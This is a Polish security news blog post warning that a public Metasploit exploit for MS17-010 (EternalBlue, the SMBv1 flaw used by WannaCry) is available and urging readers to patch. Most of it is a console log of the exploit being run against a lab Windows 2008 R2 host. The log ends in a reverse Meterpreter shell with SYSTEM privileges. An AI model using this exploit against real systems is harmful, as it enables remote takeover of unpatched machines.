Preorder drugiego tomu książki sekuraka: Wprowadzenie do bezpieczeństwa IT. -15% z kodem: sekurak-book

Zdalny exploit na MS17-010 – dostępny w Metasploit

16 maja 2017, 20:24 | W biegu | komentarze 3

Kto jeszcze nie załatał swoich Windowsów, radzę się pospieszyć. Dostępny jest już publicznie exploit na podatność MS17-010 (zdalne otrzymanie pełnych uprawnień na Windowsach – przez protokół SMBv1). Przypominam to błąd wykorzystywany przez ransomware WannaCrypt / Wana Decrypt0r 2.0 / Wanacry.

Użycie exploita nie wymaga jakiejś wielkiej wiedzy – po prostu ognia:

msf exploit(ms17_010_eternalblue) > run

[*] Started reverse TCP handler on 192.168.33.1:4444 
[*] 192.168.33.129:445 - Connecting to target for exploitation.
[+] 192.168.33.129:445 - Connection established for exploitation.
[*] 192.168.33.129:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.33.129:445 - Sending all but last fragment of exploit packet
[*] 192.168.33.129:445 - Sending NT Trans Request packet
[*] 192.168.33.129:445 - Receiving NT Trans packet
[*] 192.168.33.129:445 - Making :eb_trans2_zero packet
[*] 192.168.33.129:445 - Making :eb_trans2_buffer packet
[*] 192.168.33.129:445 - Making :eb_trans2_buffer packet
[*] 192.168.33.129:445 - Making :eb_trans2_buffer packet
[*] 192.168.33.129:445 - Making :eb_trans2_buffer packet
[*] 192.168.33.129:445 - Making :eb_trans2_buffer packet
[*] 192.168.33.129:445 - Making :eb_trans2_buffer packet
[*] 192.168.33.129:445 - Making :eb_trans2_buffer packet
[*] 192.168.33.129:445 - Making :eb_trans2_buffer packet
[*] 192.168.33.129:445 - Making :eb_trans2_buffer packet
[*] 192.168.33.129:445 - Making :eb_trans2_buffer packet
[*] 192.168.33.129:445 - Making :eb_trans2_buffer packet
[*] 192.168.33.129:445 - Making :eb_trans2_buffer packet
[*] 192.168.33.129:445 - Making :eb_trans2_buffer packet
[*] 192.168.33.129:445 - Making :eb_trans2_buffer packet
[*] 192.168.33.129:445 - Sending malformed Trans2 packets
[*] 192.168.33.129:445 - Starting non-paged pool grooming
[*] 192.168.33.129:445 - Sending start free hole packet.
[*] 192.168.33.129:445 - Receiving free hole response.
[+] 192.168.33.129:445 - Sending SMBv2 buffers
[*] 192.168.33.129:445 - Sending end free hole packet.
[*] 192.168.33.129:445 - Receiving free hole response.
[+] 192.168.33.129:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.33.129:445 - Sending final SMBv2 buffers.
[*] 192.168.33.129:445 - Sending last fragment of exploit packet!
[*] 192.168.33.129:445 - Making :eb_trans2_exploit packet
[*] 192.168.33.129:445 - Receiving response from exploit packet
[+] 192.168.33.129:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.33.129:445 - Sending egg to corrupted connection.
[*] 192.168.33.129:445 - Triggering free of corrupted buffer.
[*] Sending stage (1189423 bytes) to 192.168.33.129
[*] Meterpreter session 1 opened (192.168.33.1:4444 -> 192.168.33.129:49159) at 2017-05-14 20:03:33 -0500
[+] 192.168.33.129:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.33.129:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.33.129:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : WIN-KAUD1INC0IJ
OS              : Windows 2008 R2 (Build 7601, Service Pack 1).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x64/windows
meterpreter >

Na razie potwierdzone jest działanie na: Windows 7 x64 / Windows 2008 R2 SP1. A port na architektury 32 bitowe – i Windows XP – w trakcie.

–ms

Spodobał Ci się wpis? Podziel się nim ze znajomymi:



Komentarze

  1. Wujek Pawel

    No a gdzie link do zrodla?

    Odpowiedz
  2. q

    Przyda się do odpalania aplikacji na oscyloskopach

    Odpowiedz

Odpowiedz